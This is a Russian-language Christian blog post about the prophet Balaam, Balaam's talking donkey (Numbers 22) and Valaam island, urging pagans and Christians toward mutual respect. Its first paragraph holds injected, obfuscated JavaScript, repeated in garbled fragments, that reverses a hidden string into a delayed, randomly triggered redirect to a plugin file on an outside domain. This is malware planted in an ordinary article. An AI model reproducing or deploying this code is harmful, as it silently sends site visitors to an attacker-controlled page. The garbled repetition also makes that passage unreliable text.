Библия и общество Мысли на тему

Валаамский осел: где встречаются христианство и язычествоНа чтение 9 мин

В $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toyashhie-deyaniya-apostoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tola-andreya/»>предыдущей публикации мини-серии о святом апостоле Андрее мы говорили о том, как он прошел всю русскую землю насквозь. Путь его по ней лежал от Корсунских степей до Велесовой Земли (острова Валаам), то есть от самого юга Великой Скифии — земли руссов — и до ее крайнего севера!

Вот, тут надо сказать несколько слов об этом острове, и о его имени — и я, для начала, заимствую слова из официального сайта острова Валаам:

«Само название остров получил много столетий назад, когда здесь жили финно-угорские племена, а позже карелы. История возникновения полна легенд и загадок. Название можно перевести с финно-угорского «валамо» как «высокая земля». Некоторые сопоставляют его с именем Валы – по древнескандинавской мифологии сыном Одина, а также со славянским богом Велесом, которому здесь приносили жертвы язычники. Именем Валаам звался и библейский прорицатель о Христе.

По преданию, начало монастырю положил Андрей Первозванный, установив каменный крест во время распространения Христианства. Особо почитаются на Валааме преподобные Сергий и Герман, основавшие здесь монашеское братство.»

Вот, тут я хочу акцентировать ваше внимание на этом самом Валааме — библейском прорицателе. И на примере Валаама показать — как соотносилось древнее русское язычество с христианством. И хочется мне, чтобы и мои языческие, и мои христианские друзья — услышали это. Позвольте мне указать на то золотое звено, которое связывало две эти традиции.

Для кратости, я не буду тут ничего доказывать, приводить какие-то исторические аргументы — это надеюсь сделать в одной из последующих публикаций. Здесь же лишь укажу на общую картину — и сделаю это на примере Валаама: острова и человека.

Помните, как в «Простоквашино» почтальон Печкин говорил: Крузенштерн — человек и пароход! Валаам: остров и человек, вторю ему я. И тот комментарий к названию острова, который был приведен выше, верно указывает на языческие корни происхождения как названия, так и истории острова Валаам. По сути, это имя посвящено богу Ваалу, то есть языческому божеству. С другой стороны, Ваал, в Библии — это буквально «Господь», или Господин. И этим господином может быть Бог, а может быть Ваал — божество, представленное в форме языческих истуканов.

В предыдущей статье я уже говорил о том, что на Валааме и до сего времени сохранились каменный Кресень-Коло и вырезанные на камнях руськие письмены [руны], славящие Бога Единого. Я еще надеюсь вернуться к этому камню, но теперь хочу указать вам на то, как по замыслу Бога (а не церкви) должен был происходить (и произошел в апостольскую пору) переход славян из язычников в христиане. Не огнем и мечом, но уважением и мудростью.

Но позвольте мне вернуться к библейскому Валааму — к этому странному герою Библии, к этому прославленному язычнику, служащему Господу (Ваалу) и являющемуся пророком. В лице этого Валаама и отразилась языческая традиция древних русичей. Будучи дальним родственником Авраама, Исаака и Иакова — потомком Евера.

ЕВЕР (пришлец, странник, Быт 10:21 и др.) был сыном патриарха Салы, правнуком Сима, и отцом всех сынов Еверовых. Он был последний из благочестивых патриархов до разделения и рассеяния народов. При нем было столпотворение Вавилонское и рассеяние строителей его.

Не один лишь Авраам произошел, был взят из сынов Еверовых. Были пророки, как учит нас Библия, и у других народов. Везде были Валаамы — то есть (буквальное значение имени) «служители Господина.» Были такие и на Руси — вернее, они и являлись долгое время духовными лидерами Руси.

Так вот, библейский пророк Валаам — это наше освещенное Богом окошко, через которое мы можем вглядеться в темную избу русского язычества — и увидеть в ней свет, и замысел Божий, и подлинную свою историю. Напомню вам историю пророка Валаама. Он появляется неожиданно, когда израильтяне шли через пустыню к Обетованной земле. Валаам — не один из них, и не с ними. Он и не с моавитянами, которые нанимают его, чтобы проклясть Израиль:

«Валак же, сын Сепфоров, был царем Моавитян в то время. И послал он послов к Валааму, сыну Веорову, в Пефор, который на реке Евфратев земле сынов народа его, чтобы позвать его и сказать: вот, народ вышел из Египта и покрыл лицо земли, и живет он подле меня; итак, приди, прокляни мне народ сей, ибо он сильнее меня: может быть, я тогда буду в состоянии поразить его и выгнать его из земли; я знаю, что кого ты благословишь, тот благословен, и кого ты проклянешь, тот проклят.

И пошли старейшины Моавитские и старейшины Мадиамские, с подарками в руках за волхвование, и пришли к Валааму, и пересказали ему слова Валаковы. И сказал он им: переночуйте здесь ночь, и дам вам ответ, как скажет мне Господь. И остались старейшины Моавитские у Валаама. И пришел Бог к Валааму, и сказал: какие это люди у тебя?» (Чис.22:4-9)

Волхвы, которые спустя многие века, придут от Руси (от Востока) поклониться младенцу Иисусу — они, кстати, бережно хранили в своих традициях историю пророка Валаама — брата своего. Поскольку именно эта история заставила, в свое время, волхвов сняться со своих насиженных мест и отправиться в далекий Вифлием — куда вела их та самая Звезда, о которой пророчил еще Валаам.

Но давайте двигаться поскорее по истории Валаама-пророка, являющегося символом всего того лучшего, что было в русских волхвах. Но и, увы, худшего. Напомню, что было далее:

«И сказал Бог Валааму: не ходи с ними, не проклинай народа сего, ибо он благословен. И встал Валаам поутру, и сказал князьям Валаковым: пойдите в землю вашу, ибо не хочет Господь позволить мне идти с вами. И встали князья Моавитские, и пришли к Валаку, и сказали ему: не согласился Валаам идти с нами.

Валак послал еще князей, более и знаменитее тех. И пришли они к Валааму, и сказали ему: так говорит Валак, сын Сепфоров: не откажись прийти ко мне; я окажу тебе великую почесть и сделаю тебе все, что ни скажешь мне; приди же, прокляни мне народ сей.

И отвечал Валаам, и сказал рабам Валаковым: хотя бы Валак давал мне полный свой дом серебра и золота, не могу преступить повеления Господа, Бога моего, и сделать что‐либо малое или великое по своему произволу; впрочем, останьтесь здесь и вы на ночь, и я узнаю, что еще скажет мне Господь.

И пришел Бог к Валааму ночью, и сказал ему: если люди сии пришли звать тебя, встань, пойди с ними; но только делай то, что Я буду говорить тебе. Валаам встал поутру, оседлал ослицу свою и пошел с князьями Моавитскими» (Чис.22:12-21).

Очень уж хотелось Валааму получить эти сокровища, но он боялся Бога. Но желание в сердце было — желание, чтобы Бог разрешил ему идти. И Бог разрешил. Позволил. Но оставил последнее Слово за Собой. Но прежде, чем пророк достиг своей цели (денег) и места (гор Моава) Бог преподал ему урок:

Валаам, Ангел Божий и ослица

«И воспылал гнев Божий за то, что он пошел, и стал Ангел Господень на дороге, чтобы воспрепятствовать ему. Он ехал на ослице своей, и с ним двое слуг его. И увидела ослица Ангела Господня, стоящего на дороге с обнаженным мечом в руке, и своротила ослица с дороги, и пошла на поле; а Валаам стал бить ослицу, чтобы возвратить ее на дорогу.

И стал Ангел Господень на узкой дороге, между виноградниками, где с одной стороны стена и с другой стороны стена. Ослица, увидев Ангела Господня, прижалась к стене и прижала ногу Валаамову к стене; и он опять стал бить ее. Ангел Господень опять перешел и стал в тесном месте, где некуда своротить, ни направо, ни налево. Ослица, увидев Ангела Господня, легла под Валаамом. И воспылал гнев Валаама, и стал он бить ослицу палкою.

И отверз Господь уста ослицы, и она сказала Валааму: что я тебе сделала, что ты бьешь меня вот уже третий раз? Валаам сказал ослице: за то, что ты поругалась надо мною; если бы у меня в руке был меч, то я теперь же убил бы тебя. Ослица же сказала Валааму: не я ли твоя ослица, на которой ты ездил с начала до сего дня? имела ли я привычку так поступать с тобою? Он сказал: нет.

И открыл Господь глаза Валааму, и увидел он Ангела Господня, стоящего на дороге с обнаженным мечом в руке, и преклонился, и пал на лицо свое. И сказал ему Ангел Господень: за что ты бил ослицу твою вот уже три раза? Я вышел, чтобы воспрепятствовать тебе, потому что путь твой не прав предо Мною; и ослица, видев Меня, своротила от Меня вот уже три раза; если бы она не своротила от Меня, то Я убил бы тебя, а ее оставил бы живою.

И сказал Валаам Ангелу Господню: согрешил я, ибо не знал, что Ты стоишь против меня на дороге; итак, если это неприятно в очах Твоих, то я возвращусь. И сказал Ангел Господень Валааму: пойди с людьми сими, только говори то, что Я буду говорить тебе. И пошел Валаам с князьями Валаковыми». (Чис.22:22-35)

Я знаю, кому-то эта история покажется «еще одной еврейской сказкой». Но эта история — на страницах моей священной Библии, и я ее вырывать не собираюсь. А собираюсь вместе с вами поразмыслить над ней.

Во-первых, мы видим, что Бог и впрямь является Валааму. Мы видим, что Валаам — истинный пророк. Хотя у него и есть свои человеческие слабости, как и у всех нас. Во-вторых, мы видим, что ослица Валаама оказывается прозорливее самого пророка: она видит Ангела, она спасает Валааму жизнь (при этом подвергаясь страданиям и унижению с его стороны), и, наконец, ослица ГОВОРИТ пророку мудрые и смиренные слова. Иа-иа-иа — сменилось речью. И это в ту пору, как речь многих людей, даже пророка Валаама, по сути превратилась в ослиное — иа.

Знаете, друзья-товарищи язычники, и друзья мои христиане — тут есть над чем подумать. Вот, христиане считают себя эдакими Валаамами, а язычников, простите, ослами. Язычники, соответственно, наоборот. Но история Валаама показывает, что и от осла можно научиться, что и к ослу (даже такому, как я) возможно, стоит отнестись с уважением. А что, если этот осел не даром стоит на своем? А что, если этот осел видит то, что вы еще не видите? А что, если этому ослу «отверз Господь уста»?

Так вот, на правах этого самого осла (меня называют ежедневно десятки раз и куда менее лестными словами) позвольте мне остановиться пока прямо тут и сказать пока одно: не спешите проклинать и ругать другие народы, другие конфессии, другую культуру — даже если вам за это платят, даже если вам этого хочется, и вы привыкли, и все так делают… Вы не видите, как Бог работает с этими людьми, что им являет. Ослица видит, а вы — нет. Остановитесь! Не проклинать вас посылает Господь, а благословлять!

Остановлюсь пока, как та ослица, здесь. А на следующем промежутке пути — ведь Валааму долго было еще ехать до места назначения — расскажу о том пророчестве, которое Бог вложил не только в уста того Валаама, о котором мы тут читаем, но и в самое сердце той языческой традиции, которую Валаам представлял: пророчество о грядущем Спасителе. И если мои друзья язычники хотят оставаться верными хотя бы своей истинной традиции, то они должны прислушаться к тому, что Бог являл волхвам: к пророчеству о Спасителе. И задуматься: а не сбылось ли оно?

Честное слово, вы, язычники — как те иудеи, которых многие из вас хаят. Они не поверили в обетование Мессии, и в пророчества о Нем, и в явление Его. А вы — поверили?

А моим друзьям христианам тоже советую остановиться в своих бесконечных спорах и дрязгах, и истерично-помпезных обвинениях друг друга в ереси и сектантстве. Да, вы — избранный народ, как и в те времена Израиль был избранным народом. Но вот, Господь избрал какого-то сектанта-еретика — Валаама — чтобы благословить ваш великий избранный русский народ. Проклинаете ли вы его? Себя? Не спешите пока, остановитесь. Ваш покорный слуга-осел остановился здесь, чтобы вы немного поразмыслили.

Автор: Жиганков О.А.

Поделитесь своими мыслями ниже, в комментариях.

Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.

Мы в соцсетях

Солёное радиоTelegram, YouTube, ВКонтакте, Яндекс Дзен

Открытая семинарияTelegram, YouTube, ВКонтакте, Яндекс Дзен

«Новости христианства» — Telegtam, Facebook, ВКонтакте

4.2/5

You Might Also Like

No Comments

    Leave a Reply

    Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.